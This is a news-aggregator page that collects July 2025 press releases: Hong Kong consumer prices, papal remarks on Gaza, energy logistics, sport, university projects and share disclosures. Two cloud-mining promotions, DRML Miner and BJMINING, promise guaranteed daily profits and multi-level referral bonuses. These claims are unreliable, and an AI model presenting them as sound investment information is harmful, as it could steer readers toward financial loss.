NewzIntel.com

    • Checkout Page
    • Contact Us
    • Default Redirect Page
    • Frontpage
    • Home-2
    • Home-3
    • Lost Password
    • Member Login
    • Member LogOut
    • Member TOS Page
    • My Account
    • NewzIntel Alert Control-Panel
    • NewzIntel Latest Reports
    • Post Views Counter
    • Privacy Policy
    • Public Individual Page
    • Register
    • Subscription Plan
    • Thank You Page

Category: CTF

  • MIL-OSI Asia-Pac: Consumer Price Indices for June 2025

    Source: Hong Kong Government special administrative region

    Consumer Price Indices for June 2025 
    On a seasonally adjusted basis, the average monthly rate of change in the Composite CPI for the 3-month period ending June 2025 was 0.0%, and that for the 3-month period ending May 2025 was -0.1%. Netting out the effects of all Government’s one-off relief measures, the corresponding rates of change were both 0.1%.
     
    Analysed by sub-index, the year-on-year rates of increase in the CPI(A), CPI(B) and CPI(C) were 2.1%, 1.3% and 0.9% respectively in June 2025, as compared to 2.8%, 1.6% and 1.2% respectively in May 2025. Netting out the effects of all Government’s one-off relief measures, the year-on-year rates of increase in the CPI(A), CPI(B) and CPI(C) were 1.5%, 0.9% and 0.7% respectively in June 2025, as compared to 1.3%, 0.8% and 0.8% respectively in May 2025.
     
    On a seasonally adjusted basis, for the 3-month period ending June 2025, the average monthly rates of change in the CPI(A), CPI(B) and CPI(C) were all 0.0%. The corresponding rates of change for the 3-month period ending May 2025 were all -0.1%. Netting out the effects of all Government’s one-off relief measures, the average monthly rates of change in the seasonally adjusted CPI(A), CPI(B) and CPI(C) for the 3-month period ending June 2025 were 0.2%, 0.1% and 0.0% respectively, and the corresponding rates of change for the 3-month period ending May 2025 were 0.1%, 0.1% and 0.0% respectively.
     
    Amongst the various components of the Composite CPI, year-on-year increases in prices were recorded in June 2025 for housing (2.8%), transport (1.9%), electricity, gas and water (1.6%), alcoholic drinks and tobacco (1.4%), meals out and takeaway food (1.4%), miscellaneous goods (1.3%), and miscellaneous services (1.0%).
     
    On the other hand, year-on-year decreases in the components of the Composite CPI were recorded in June 2025 for clothing and footwear (-4.1%), durable goods (-2.5%), and basic food (-0.4%).
     
    For the first half of 2025 as a whole, the Composite CPI rose by 1.7% over a year earlier. The respective increases in the CPI(A), CPI(B) and CPI(C) were 2.3%, 1.5% and 1.2% respectively. The corresponding increases after netting out the effects of all Government’s one-off relief measures were 1.2%, 1.5%, 1.0% and 1.0% respectively.
     
    In the second quarter of 2025, the Composite CPI rose by 1.8% over a year earlier, while the CPI(A), CPI(B) and CPI(C) rose by 2.4%, 1.6% and 1.3% respectively. The corresponding increases after netting out the effects of all Government’s one-off relief measures were 1.1%, 1.4%, 1.0% and 0.9% respectively.
     
    For the 12 months ending June 2025, the Composite CPI was on average 1.8% higher than that in the preceding 12-month period. The respective increases in the CPI(A), CPI(B) and CPI(C) were 2.3%, 1.6% and 1.4% respectively. The corresponding increases after netting out the effects of all Government’s one-off relief measures were 1.2%, 1.4%, 1.1% and 1.0% respectively.
     
    Commentary
     
    A Government spokesman said that consumer price inflation stayed modest in June.  The underlying Composite CPI increased by 1.0% over a year earlier, same as the preceding month. Price pressures on various major components were contained in general.
     
    Looking ahead, overall inflation should remain modest in the near term, as pressures from domestic costs and external prices should stay broadly in check. The Government will monitor the situation closely.
     
    Further information
     
    The CPIs and year-on-year rates of change at section level for June 2025 are shown in Table 1. The time series on the year-on-year rates of change in the CPIs before and after netting out the effects of all Government’s one-off relief measures are shown in Table 2. For discerning the latest trend in consumer prices, it is also useful to look at the changes in the seasonally adjusted CPIs. The time series on the average monthly rates of change during the latest 3 months for the seasonally adjusted CPIs are shown in Table 3. The rates of change in the original and the seasonally adjusted Composite CPI and the underlying inflation rate are presented graphically in Chart 1.
     
    More detailed statistics are given in the “Monthly Report on the Consumer Price Index”. Users can browse and download this publication at the website of the C&SD (www.censtatd.gov.hk/en/EIndexbySubject.html?pcode=B1060001&scode=270 
    For enquiries about the CPIs, please contact the Consumer Price Index Section of the C&SD (Tel: 3903 7374 or email:
    cpi@censtatd.gov.hkIssued at HKT 16:30

    NNNN

    CategoriesMIL-OSI

    MIL OSI Asia Pacific News –

    July 21, 2025
  • MIL-OSI Europe: Pope Leo XIV: “Profound sadness” for the “Israeli army attack” against the Gaza parish

    Source: Agenzia Fides – MIL OSI

    Sunday, 20 July 2025

    VaticanMedia

    Castel Gandolfo (Agenzia Fides) – “I express my profound sadness regarding last Thursday’s attack by the Israeli army on the Catholic Parish of the Holy Family in Gaza City”. Pope Leo expressed his clear and explicit words today, referring to the Israeli raid on the compound of the Latin Catholic Church dedicated to the Holy Family in the Gaza Strip.After the Angelus prayer, which he recited for the second time before the crowd gathered in Piazza della Libertà in Castel Gandolfo, Pope Leo clearly recalled those responsible for the tragedy, and also recalled the names of the three victims of the Israeli attack: Saad Issa Kostandi Salameh, Foumia Issa Latif Ayyad, and Najwa Ibrahim Latif Abu Daoud. “This act, unfortunately,” Pope Leo continued, “adds to the continuous military attacks against the civilian population and places of worship in Gaza.” The Pope once again called for an immediate halt to the barbarism of the war and for a peaceful resolution of the conflict. He appealed “to the international community to observe humanitarian law and to respect the obligation to protect civilians, as well as the prohibition of collective punishment, the indiscriminate use of force and the forced displacement of the population”.He also reaffirmed his closeness to “our beloved” Middle Eastern Christians: “I deeply sympathise,” the Bishop of Rome told them, “with your feeling that you can do little in the face of this grave situation. You are in the heart of the Pope and of the whole Church. Thank you for your witness of faith.”On Friday, July 18, as reported in the statement released by the Holy See Press Office, Israeli Prime Minister Benjamin Netanyahu had a telephone conversation with Pope Leo regarding “the military attack by the Israeli army” that struck the Church of the Holy Family in Gaza, killing three people and injuring others, including some seriously. On the Israeli side, this tragic event was presented as an “accident” or a “mistake.” That same Friday evening, in an interview with an Italian television channel, Cardinal Secretary of State Pietro Parolin also stated that “it’s legitimate to doubt that the raid on the church in Gaza was a ‘mistake’, rather than the result of “a desire to hit a Christian church knowing how much Christians are an element of moderation in the Middle East even in relations between Palestinians and Jews.” Therefore,” Cardinal Parolin added, “there would once again be a desire to eliminate any element that could help achieve at least a truce and then peace.”Today, in the brief catechesis delivered before the Angelus, Pope Leo (who had presided over the Eucharistic Concelebration in the Cathedral of Albano this morning) drew inspiration from the day’s liturgical readings to draw attention to the dynamics of hospitality: that practiced by Abraham and his wife Sarah toward the Lord, made present in the form of three mysterious strangers, and that reserved for Jesus by the sisters Martha and Mary.”Every time we accept the invitation to the Lord’s Supper and participate in the Eucharistic table,” Pope Leo recalled, “it is God himself who ‘comes to serve us.’ And yet, our God first knew how to be a guest, and today too he stands at our door and knocks.” The Pontiff focused in particular on the Gospel episode of the hospitality offered to Jesus by Mary and Martha, the former listening to the Lord’s words, the latter working hard to welcome him and complaining about her sister’s lack of cooperation. “Martha,” the Pontiff acknowledged, “is a generous person, but God calls her to something more beautiful than generosity itself. He calls her to come out of herself.” Only this—added the Bishop of Rome—”makes our life flourish: opening ourselves to something that distracts us from ourselves and at the same time fulfills us. At the moment when Martha complains because her sister has left her alone to serve, Mary seems to have lost all sense of time, won over by the word of Jesus. She is no less concrete than her sister, nor any less generous. However, she seized the opportunity.” (GV) (Agenzia Fides, 20/7/2025)
    Share:

    MIL OSI Europe News –

    July 21, 2025
  • MIL-OSI: DRML Miner Launches Global Mobile Cloud Mining Platform – Earn Passive Income with XRP

    Source: GlobeNewswire (MIL-OSI)

    London, UK, July 21, 2025 (GLOBE NEWSWIRE) — DRML Miner is a UK-based cloud mining service provider that provides simple, secure and sustainable cryptocurrency mining solutions to individual users around the world. Focusing on convenience, clean energy and automated passive income, DRML Miner aims to democratize mining and enable users to earn from the blockchain economy without any technical barriers or hidden costs.
    DRML Miner addresses these industry challenges through its mobile cloud mining platform, leveraging Ripple’s fast settlement capabilities and deploying decentralized off-grid mining farms powered by cloud infrastructure.
    Main features of DRML Miner mining platform
    – Mobile-first design: Fully accessible via smartphones (iOS and Android) and web browsers, mining can be done anytime, anywhere.
    – No hardware required: Cloud-based operation eliminates expensive equipment and technical complexity.
    – Focused on XRP mining efficiency: Leverage XRP’s fast settlement speed and low transaction fees to optimize user earnings.
    – AI-driven optimization: Advanced AI dynamically manages mining resources to maximize profitability and reduce costs.
    – Multi-cryptocurrency flexibility: In addition to XRP, it also supports mining of Bitcoin (BTC), Ethereum (ETH), USDT (TRON), and Dogecoin (DOGE).
    – Sustainable mining practices: Operates with 100% renewable energy and adheres to global environmental and social governance (ESG) standards.
    – Transparent earnings system: Daily earnings tracking with instant withdrawal or reinvestment options, enhancing user control and transparency.

    How to get started – Sign up here and get $10
    Flexible and diverse contracts, the following are popular choices for quick returns
    $10 contract: 1 day contract, profit $10 + $0.6
    $100 contract: 2 days contract, profit $100 + $7
    $500 contract: 5 days contract, profit $500 + $32.5
    $1,000 contract: 10 days contract, profit $1,000.00 + $135
    (Click here to view more potentially profitable contracts)
    DRML Miner opens convenient mobile cloud mining

    Cryptocurrency solutions are accelerating towards smarter and more convenient directions. As the market moves towards clarity and the demand for frictionless mining experiences continues to grow, one thing becomes clear: the future of cryptocurrency profitability may already be in your hands.

    Official website: https://drmlminer.com/

    Attachment

    • DRML Miner

    The MIL Network –

    July 21, 2025
  • MIL-OSI Africa: Cabship Eyes Strengthened Logistics in Africa, Joins African Energy Week (AEW) 2025 as Silver Partner

    Source: APO

    Angolan logistics and supply chain management company Cabship has joined the African Energy Week (AEW): Invest in African Energies conference – taking place September 29 to October 3 in Cape Town – as a Silver Partner. As the largest event of its kind on the continent, AEW: Invest in African Energies unites the entire African energy sector and its value chain, from upstream operators to technology and service providers to infrastructure developers and logistics firms. Cabship’s participation reflects a broader commitment to supporting African oil and gas projects through enhanced logistics and infrastructure development.

    Celebrating 16 years of operations in 2025, Cabship has emerged as a strong logistics partner for oil and gas companies in Angola – sub-Saharan Africa’s second largest oil producer. The company is committed to enhancing the Angolan logistics value chain through infrastructure developments, modernized solutions and strong ties with international energy companies. With digitalization and diversification at the fore, the company works closely with operators in Angola as they strive to enhance crude production, diversify the energy industry through non-associated gas developments and scale-up energy exports and regional distribution.

    Recent projects spearheaded by Cabship reflect this commitment. Notably, the company has bolstered its infrastructure in recent years under efforts to streamline oil and gas trade and storage. The company is looking at acquiring 50,000 m² construction yard near Malongo in Cabinda, which will enhance fabrication and logistics capabilities in both Cabinda and Soyo in Angola. Cabship is also in the process of establishing a diving and offshore marine support company in the Cabinda Special Economic Zone in partnership with maritime services provider Octomar. An agreement was signed between the companies in 2023. As of late-2024, the partners were finalizing key infrastructure plans and advancing discussions to acquire the requisite assets for marine and diving operations. The newly established marine company will play a strategic part in supporting offshore oil and gas operations, particularly as Angola plans to award new offshore concessions in the planned 2025 licensing round. 

    Cabship has a strong track record of working with a range of international operators in Angola. The company has provided a range of support services for upstream operators, including energy major Chevron and international energy company Azule Energy – some of the biggest operators in the country. Services include critical logistics and material management. Additionally, Cabship conducted comprehensive inventory audits for Etu Energies – Angola’s largest private oil company. The audit has significantly improved the reliability, availability and efficiency of Etu Energias’ inventory management.

    Beyond Angola, Cabship is working at strengthening its global ties. The company has expanded its presence in the global landscape, recently opening an office in Houston in the United States. The Houston division will support the company’s procurement activities in Angola, providing a crucial link between the African nation and Houston – considered the world’s oil and gas hub. Specifically, the office will aid Chevron’s operations across the southern African region, thereby supporting new investments and upstream operations. Stepping into this picture, Cabship’s participation at AEW: Invest in African Energies 2025 will support future collaborations and global partnerships. As the company seeks to expand its presence, taking Angolan expertise worldwide, AEW: Invest in African Energies 2025 will serve as a catalyst for global connections.

    “Cabship is a company that is committed to Africa’s oil and gas future. By enhancing its logistics and upstream service offerings, working closely with international operators and leveraging global partnerships to strengthen procurement, the company is positioning Africa as a key destination for oil and gas development. Angolan oil production will be driven by companies across the logistics sector, with Cabship at the fore,” states Tomás Gerbasio, VP Commercial and Strategic Engagement, African Energy Chamber. 

    Distributed by APO Group on behalf of African Energy Chamber.

    Media files

    .

    MIL OSI Africa –

    July 21, 2025
  • MIL-OSI Russia: Young engineers from Polytechnic University won bronze at the all-Russian competition “Robocross.Dune”

    Translation. Region: Russian Federal

    Source: Peter the Great St. Petersburg Polytechnic University –

    An important disclaimer is at the bottom of this article.

    The 15th All-Russian competition of high-cross-country robotic platforms “Robocross.Dune” was held at the “Beryozovaya Poima” training ground in the Nizhny Novgorod Region. This year, the Polytechnic University team participated for the first time. Activists from the Polytech Voltage Machine (PVM) student association of the Institute of Mechanical Engineering, Materials and Transport presented a universal tracked platform of their own design, “Object 314”.

    The SPbPU team included students, postgraduates and employees of the PVM design bureau. This includes project manager Gennady Zyabkin, team leader Vsevolod Gaiduk, as well as engineers: designer Alexander Kutuzov, programmer Kirill Khitushkin and researcher Anton Larionov (representative of the Scientific Research Laboratory “Industrial Systems of Streaming Data Processing”).

    The technological partner of Polytech Voltage Machine was the company “Scientific and Production Enterprise “Measuring Technologies SPb”, which specializes in the development of control systems for electric drives.

    The Polytechnicians successfully completed all stages. They presented engineering documentation to the jury, tested the safety systems and completed the competition with complex tests on a route with various obstacles.

    As a result, representatives of Polytech Voltage Machine took third place, proving the high reliability and potential of their development.

    “Such events help to effectively evaluate the capabilities of the robotic platform, since the design, electronics and control system are subject to critical loads during competitions. Next year, we intend to implement autonomous control, which will allow us to use it in more difficult conditions, and become the absolute winners of the competition,” said Gennady Zyabkin, a second-year master’s student at the Higher School of Automation and Robotics and the head of the Object 314 project.

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI China: China get reality check with Asia Cup bronze finish

    Source: People’s Republic of China – State Council News

    China clinched third place at the 2025 FIBA Women’s Asia Cup with a dominant 101-66 victory over South Korea on Sunday, concluding the first major tournament of its Los Angeles Olympic cycle with a bittersweet result that served as both a disappointment and a crucial learning experience.

    While the team secured a podium finish, its title defense was decisively ended a day earlier in the semifinals by a sharp-shooting Japanese team, a defeat that exposed the challenges ahead of China.

    Yang Shuyu (front) of China reacts after the semifinal match between China and Japan at the FIBA Women’s Asia Cup 2025 in Shenzhen, south China’s Guangdong Province, July 19, 2025. (Xinhua/Mao Siqian)

    The wake-up call was delivered by Japan’s accurate long-range attack, led by 19-year-old point guard Kokoro Tanaka, who posted 21 points in the first quarter alone, hitting five-for-five from beyond the arc.

    Japan hit 16 three-pointers in the game, shooting 47.1 percent from deep and scoring 30 more points from beyond the arc than China. The barrage exposed the defensive liabilities of China’s highly anticipated “Twin Towers” lineup.

    The pairing of 2.26-meter (7-foot-5) prodigy Zhang Ziyu and 2.11-meter (6-foot-11) Han Xu, dominant in the group stage against Indonesia, South Korea and New Zealand, struggled against Japan’s “small, fast, and agile” style. Zhang’s slower foot speed was frequently exploited to create open space, while Han was often forced to defend multiple perimeter players.

    “The ‘Twin Towers’ lineup showed some weaknesses in limiting their three-pointers,” head coach Gong Luming admitted post-game. “Their threes posed a huge threat and created a lot of trouble for us. We will learn from this and seriously think about how our big lineups can adapt to this fast-paced style.”

    Center Han Xu acknowledged the team’s shortcomings after the loss. “Against a quick team like Japan, you need to be efficient to limit their fast breaks and threes, but our defense was not good enough,” she said.

    Despite the loss, Gong affirmed the team would not abandon its long-term strategy.

    “We will not change our plans just because we lost this game; that would be wrong. We are preparing for the 2028 Los Angeles Olympics and will continue to build on the experience gained today,” Gong said.

    For 18-year-old Zhang, the tournament was a glimpse of what’s to come. She finished her senior team debut averaging an impressive 15.6 points and 5.6 rebounds. While her dominance in the paint is clear, so are the areas for improvement.

    “Her potential is huge, but the public’s expectations for her are too high right now,” Gong said. “The overall offensive and defensive chemistry with her is still lacking… but this is a process we must go through.”

    The tournament was also an emotional one for Han, who broke down in a press conference after the semifinal loss. Having faced public pressure for skipping overseas leagues to focus on national team duties, she stated her intention to play abroad in the future.

    “After this year’s major tournaments are over, if there is an opportunity to play in an overseas league, I will do my best to fight for it,” Han said.

    “This might be my last time wearing the national team jersey,” said China’s veteran forward Huang Sijing. “Looking back on my 10 years representing China, there have been both joys and regrets, but as I reach the twilight of my career, what I feel most is pride.”

    Although she expressed disappointment with the team’s result at the Asia Cup, Huang acknowledged the broader context. “The team is undergoing a generational transition, and we’re also adapting to a new coaching philosophy. Given we’ve only had three months to work together, I think we’ve already made good progress.”

    As China left Shenzhen with a bronze medal instead of the desired gold, the coach framed the outcome as a necessary wake-up call. He also noted that he had picked up some tactical ideas from Japan, Australia and South Korea during the tournament – insights he said would be valuable for the development of China’s younger players.

    With only three months together, the new squad learned where it stands and the work required to return to the top of the podium.

    “We certainly saw a lot of our own shortcomings, but the experience gained is more important for the team’s future. I hope the team maintains its fighting spirit… that is the foundation for our future development,” Gong added. 

    MIL OSI China News –

    July 21, 2025
  • MIL-OSI United Kingdom: Ready, set, go – popular Get Active events return for 2025

    Source: City of Portsmouth

    Portsmouth City Council has announced the return of its popular Get Active events this summer, following a break in 2024. These free, family-friendly fun days are back and bigger than ever, offering residents the chance to enjoy the city’s open spaces while discovering the benefits of greener, healthier travel.

    Running throughout August, these free events offer a mix of exciting activities, giveaways, and expert advice, including free lessons to get people of all ages into cycling. The events are designed to inspire people of all ages to leave the car at home and explore Portsmouth by foot or bike.

    The events take place in four locations on four dates in August, with each date running from 11am to 2pm:

    • Tuesday 5 August – Canoe Lake, Southsea
    • Wednesday 6 August – Baffins Park
    • Wednesday 13 August – Alexandra Park, Hilsea
    • Thursday 14 August – Paulsgrove Park

    At the events, people can enjoy a cycling obstacle course, free bike safety checks and security marking, free facepainting and inflatable slide for children and, for those looking to get back in the saddle, up to 50% off used bikes (max £50 discount) in partnership with Portsmouth Cycle Exchange. Attendees also have the chance to win a brand-new bike, lock and helmet in a prize draw.

    Cllr Peter Candlish, Portsmouth City Council Cabinet Member for Transport, said:

    “I’m really pleased that our popular Get Active events are returning for 2025. These free, fun activities are a brilliant way to get families outdoors, enjoying our parks and learning about the benefits of active travel. Whether you’re a seasoned cyclist or just looking for a great day out for families, this is a great way to make it easier and more enjoyable for people to choose cleaner, greener and healthier ways to get around our city.”

    No booking is necessary, but people are encouraged to sign up on Eventbrite so the council can manage the events effectively. Full details are available at www.travel.portsmouth.gov.uk/getactive.

    MIL OSI United Kingdom –

    July 21, 2025
  • MIL-OSI Russia: Scientists from NSU and Scientific and Technical Complex “Microsurgery of the Eye” are developing an autonomous AI assistant for visually impaired people

    Translation. Region: Russian Federal

    Source: Novosibirsk State University –

    An important disclaimer is at the bottom of this article.

    The basic model of an autonomous intelligent assistant for visually impaired and blind patients was presented to Deputy Prime Minister of the Russian Federation — Head of the Government Staff Dmitry Grigorenko during his visit to Novosibirsk State University. The device is being developed using large language models and artificial intelligence technologies.

    The idea of the development belongs to the Novosibirsk branch of the Federal State Autonomous Institution “National Medical Research Center “Microsurgery of the Eye” named after Academician S.N. Fedorov” of the Ministry of Health of the Russian Federation, which, together with scientists Research Center in the Field of Artificial Intelligence of NSU (NSU AI Center) creates a new device designed to make it easier for visually impaired and blind people to navigate in space using modern technologies.

    As noted by the director of the Novosibirsk branch of the Scientific and Technical Complex “Microsurgery of the Eye”, professor, doctor of medical sciences Valery Chernykh, today there are various approaches related to the possibility of giving a blind person a chance of functional orientation in the surrounding space, his adaptation and rehabilitation with the possibility of actively and independently living a full life.

    First of all, these are social and rehabilitation-educational programs that require quite large financial investments. In addition, over the past 20 years, scientists from various countries have been attempting to implant expensive and high-tech chips either into the retina or directly into the occipital part of the cerebral cortex, which is responsible for the function of vision. These are very complex and expensive operations with a high risk of complications and, unfortunately, with a fairly low percentage of effectiveness, since the results obtained do not last long. Several such operations have also been carried out in our country, the results of which cannot yet be considered satisfactory.

    — Considering the active development of technologies related to the capabilities of artificial intelligence, the idea was born to use the auditory analyzer of the brain for human orientation in space. When a person reads a book or listens to an audio recording, certain images of objects, etc. are formed in his brain. If a visually impaired or blind patient is given the opportunity to determine the distance to an object (doorway, window, vehicle), its size, etc. through the auditory analyzer, this will certainly help him in real life and adaptation in the social environment. Considering the previous successful experience of joint work, we decided to join forces with scientists from the Research Center for Artificial Intelligence of the Novosibirsk State University in order to create such a technology that should be autonomous and not use the Internet, — said Valery Chernykh.

    At the first stage, the developers create a prototype of the device and train the model in accordance with the tasks set, which is actively carried out by the formed working group, which includes scientists from the NSU AI Center and the Scientific and Technical Complex “Microsurgery of the Eye”.

    — We use large language models to help this category of patients analyze the surrounding space — to create a guide for them that could give a concentrated verbal description of all objects in front of the user. The principle of this system is simple: a video camera will “see” instead of a person, the information from which will be sent to a portable computer, which will convert it into text. Then the text description is converted by a voice assistant and sent directly to the patient through headphones. This message provides the basic information that the user needs to know to navigate in space, — explained Alexey Okunev, head of the project at the NSU AI Center.

    The device is developed using a multimodal language model, which allows it to already provide a fairly high-quality verbal description of surrounding rooms and objects. In the future, the user will be able to ask clarifying questions about the observed scene and receive detailed answers to them. This language model also perfectly recognizes texts, reads inscriptions, signs, obstacle warnings, etc.

    Currently, a basic model has been created, a prototype of the device will be ready by the end of 2025. This is a compact wearable system consisting of a single-board 16-core computer placed in a shoulder bag, a video camera (for example, GoPro) and headphones. The device will be equipped with a battery, and all elements will be connected by wireless communication channels. The user will hold the video camera in his hand and point it in the desired direction. The total weight of the device with the battery will be about 1 kg.

    According to the experts of the NSU Center for Information Technologies, it will take more than one year to develop the final product ready for replication, and now they are at the very start of the project. This concerns both the technical part and the training of artificial intelligence. After the prototype is created this year, long-term work will begin on setting up the device, setting modes, collecting a database and training AI.

    The developers plan to teach the AI to prioritize information delivery, highlighting from the entire video sequence the details that are most important for the visually impaired person to orient themselves in space and assess the surrounding environment depending on the situation. It is assumed that the device will have several operating modes: a movement mode for moving in space, a reading mode for working with text documents, etc.

    It will also be necessary to train a blind or visually impaired patient to work with the device in various modes and adapt it to new capabilities. As noted by the Scientific and Technical Complex “Microsurgery of the Eye”, at this stage, the work of not only ophthalmologists, but also specialists in the field of neurophysiology will be required. And the third task that will need to be solved is the need to create a specialized ophthalmological rehabilitation center to prepare blind patients directly for working with the device.

    “The creation of such a device is of interest in the ophthalmological community as an extremely relevant and necessary area, the implementation of which will enable blind patients to adapt to the environment, which is a socially significant project,” concluded Valery Chernykh.

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI: Prosafe SE: SHAREHOLDING DISCLOSURE

    Source: GlobeNewswire (MIL-OSI)

    21 July 2025 – Reference is made to the stock exchange announcement made by Prosafe SE (the “Company”) on 24 April 2025 regarding the recapitalization of the Company, where it was announced, amongst other things, that part of the Company’s debt, including to the institutions listed below, will be converted into equity in the Company (the “Debt Conversion”). Further reference is made to the stock exchange notice made by the Company today, 21 July 2025, regarding completion of the Debt Conversion.

    Following the Debt Conversion, the shareholders listed below will exceed a disclosure threshold pursuant to the Norwegian Securities Trading Act Section 4-2:

    1. Acasta Global Master Fund will own in total 21,555,640 shares in the Company, representing approximately 6.35 % of the outstanding shares and votes in the Company following completion of the Debt Conversion, thereby crossing the 5 % disclosure threshold in the Norwegian Securities Trading Act Section 4‑2;
    1. BlueBay Destra International Event-Driven Credit Fund (“BlueBay Destra”) and The BlueBay Event Driven Credit (Master) Fund Limited (“BlueBay Event”), investment funds under discretional investment management of RBC Global Asset Management (UK) Limited (“RBC GAM UK”), will, when the shares of the two funds are counted together, own a total of 41,251,716 shares in the Company, representing approximately 12.15 % of the outstanding shares and votes in the Company following completion of the Debt Conversion, thereby crossing the 10 % disclosure threshold in the Norwegian Securities Trading Act Section 4‑2. BlueBay Destra will beneficially own 22,688,444 and BlueBay Event will beneficially own 18,563,272 of these shares, representing approximately 6.68 % and 5.47 %, respectively, of the outstanding shares and votes in the Company following completion of the Debt Conversion.
    1. Caius Capital Master Fund (“Caius”), Star V Partners LLC (“Star V”), and LMA-SPC MAP 204 Segregated Portfolio (“LSP”), investment funds under discretional investment management by Caius Capital LLP (“CCL”), will, when the shares of each such fund are counted together, own a total of 57,452,631 shares in the Company, representing approximately 16.92 % of the outstanding shares and votes in the Company, thereby crossing the 15 % disclosure threshold in the Norwegian Securities Trading Act Section 4‑2. Caius will beneficially own 50,274,435, Star V will beneficially own 5,788,560, and LSP will beneficially own 1,389,636 of these shares, representing approximately 14.81 %, 1.71 % and 0.41 %, respectively, of the outstanding shares and votes in the Company following completion of the Debt Conversion.
    1. The Export-Import Bank of China will own in total 42,850,422 shares in the Company, representing approximately 12.62 % of the outstanding shares and votes in the Company, thereby crossing the 10 % disclosure threshold in the Norwegian Securities Trading Act Section 4‑2;
    1. DNB Bank ASA will own in total 47,576,613 shares in the Company (of which 30,233 shares are borrowed shares that have been lent out with a right to recall), representing approximately 14.01 % of the outstanding shares and votes in the Company, thereby crossing the 10 % disclosure threshold in the Norwegian Securities Trading Act Section 4‑2; and
    1. SpareBank 1 Sør-Norge ASA will own in total 17,786,952 in the Company, representing approximately 5.24 % of the outstanding shares and votes in the Company, thereby crossing the 5 % disclosure threshold in the Norwegian Securities Trading Act Section 4‑2,

    each based on a total of 339,504,369 issued and outstanding shares and voting rights in the Company at the time of completion of the Debt Conversion.

    This information is subject to the disclosure requirement in the Norwegian Securities Trading Act section 4‑2.

    The MIL Network –

    July 21, 2025
  • MIL-OSI: Earn $15,300 a day, BJMINING helps stabilize income during Bitcoin’s highs

    Source: GlobeNewswire (MIL-OSI)

    Chicago, Illinois, July 21, 2025 (GLOBE NEWSWIRE) — Earn $15,300 a day, BJMINING helps stabilize income during Bitcoin’s highs

    As the US “Crypto Week” promoted three encryption-related legislations, market confidence soared, and Bitcoin recently hit a new record high, breaking through $123,000 and maintaining around $120,000. The traditional “holding coins and waiting” strategy is difficult to capture stable returns in such a market, and BJMINING‘s Bitcoin cloud mining solution provides a more certain option for investors seeking sustainable returns.

    BTC is rising strongly, cloud mining is ushering in a golden opportunity

    The current price of Bitcoin fluctuates around $118,500, and the price has continued to rise in the past seven days. Institutions continue to increase their ETF layout, market sentiment is bullish, and retail investors are enthusiastic about entering the market. In this trend, BJMINING is the first to launch an intelligent cloud mining solution for BTC, breaking the hardware threshold and allowing all users to enjoy the benefits of blockchain.

    How does BJMINING make mining easy?

    BJMINING was founded in 2015 and is headquartered in the UK. Relying on globally deployed green energy mines and AI scheduling algorithms, users can participate in cloud mining of mainstream encrypted assets such as Bitcoin and Dogecoin without purchasing machines, maintenance, or technical background.

    Platform advantages include:

    • Sign up and receive $15 experience bonus, and get $0.6 sign-in bonus every day
    • No mining machine is required, the contract can be started with one click, and the profit will be automatically settled every 24 hours
    • Supports deposits and withdrawals of mainstream currencies such as BTC, USDT, DOGE, ETH, and XRP
    • Adopt AI scheduling + clean energy mining to ensure 99.9% computing power online rate
    • 0 handling fee for the whole process, transparent and traceable revenue chain, and support for deposit in seconds
    • High security: McAfee® + Cloudflare® dual security protection, assets are insured by AIG
    • Multi-level invitation reward mechanism, 3% for direct referrals and 2% for indirect referrals, with unlimited profit space

    Contract Example: Using Small Amounts to Get High Returns

    The following are the current popular Bitcoin cloud mining contracts(Applicable to top-up of mainstream currencies such as BTC, DOGE, XRP, USDT, etc.):

    All of the above contracts are automatically executed, supporting users to reinvest or withdraw coins at any time, realizing truly automated passive income.

    Timing determines profit, it is the right time to choose BJMINING

    • Policy support:Three major bills were advanced during “Crypto Week”, and the legality of stablecoins and crypto assets was further clarified
    • Funds coming in:ETFs continue to attract funds, and large asset management companies are heavily invested in BTC
    • Environmental Trends:Bitcoin energy consumption has become a hot topic. BJMINING has completed the green energy layout ahead of schedule and is at the forefront of compliance
    • Market sentiment:Retail investors return, and the FOMO effect is enhanced, bringing a long-term user base for cloud mining

    BJMINING is not just about mining, it is also a digital asset management tool

    Facing the ups and downs of the crypto market, BJMINING always adheres to the three core values: stability, security, and sustainability. The platform will continue to optimize the product structure and risk control system to help users maintain and increase the value of their assets in market fluctuations.

    Conclusion: Grasp the Bitcoin dividend, start with BJMINING

    Bitcoin continues to break new highs, and the market is unprecedentedly hot. BJMINING provides a stable income channel without the need to predict the market or watch the market. Join BJMINING now to maximize your daily income in the historic rise of Bitcoin.

    Visit the official website now: https://bjmining.com
    Official email: info@bjmining.com
    APP download: https://bjmining.com/xml/index.html#/app

    Attachment

    The MIL Network –

    July 21, 2025
  • MIL-OSI: Danske Bank share buy-back programme: transactions in week 29

    Source: GlobeNewswire (MIL-OSI)

    Company announcement no. 34 2025

    Danske Bank

    Bernstorffsgade 40

    DK-1577 København V

    Tel. + 45 33 44 00 00

    21 July 2025

    Page 1 of 1

    Danske Bank share buy-back programme: transactions in week 29

    On 7 February 2025, Danske Bank A/S announced a share buy-back programme for a total of DKK 5 billion, with a maximum of 45,000,000 shares, in the period from 10 February 2025 to 30 January 2026, at the latest, as described in company announcement no. 6 2025.

    The Programme is carried out in accordance with Article 5 of Regulation (EU) No 596/2014 of the European Parliament and Council of 16 April 2014 (the “Market Abuse Regulation”) and the Commission Delegated Regulation (EU) 2016/1052 of 8 March 2016 (together with the Market Abuse Regulation, the “Safe Harbour Rules”).

    The following transactions on Nasdaq Copenhagen A/S were made under the share buy-back programme in week 29:

      Number of shares VWAP DKK Gross value DKK
    Accumulated, last announcement 8,482,830 234.6883 1,990,821,369
    14 July 2025 103,147 258.1543 26,627,842
    15 July 2025 97,316 256.5786 24,969,203
    16 July 2025 95,525 256.6734 24,518,727
    17 July 2025 139,946 254.1745 35,570,705
    18 July 2025 200,000 254.3732 50,874,640
    Total accumulated over week 29 635,934 255.6258 162,561,116
    Total accumulated during the share buyback programme 9,118,764 236.1485 2,153,382,484

    With the transactions stated above, the total accumulated number of own shares under the share buy-back programme corresponds to 1.092% of Danske Bank A/S’ share capital.

    Danske Bank

    Contact: Claus Ingar Jensen, Head of Group Investor Relations, tel. +45 25 42 43 70

    Attachment

    • Danske Bank Company announcement UK Weekly SBB announcement

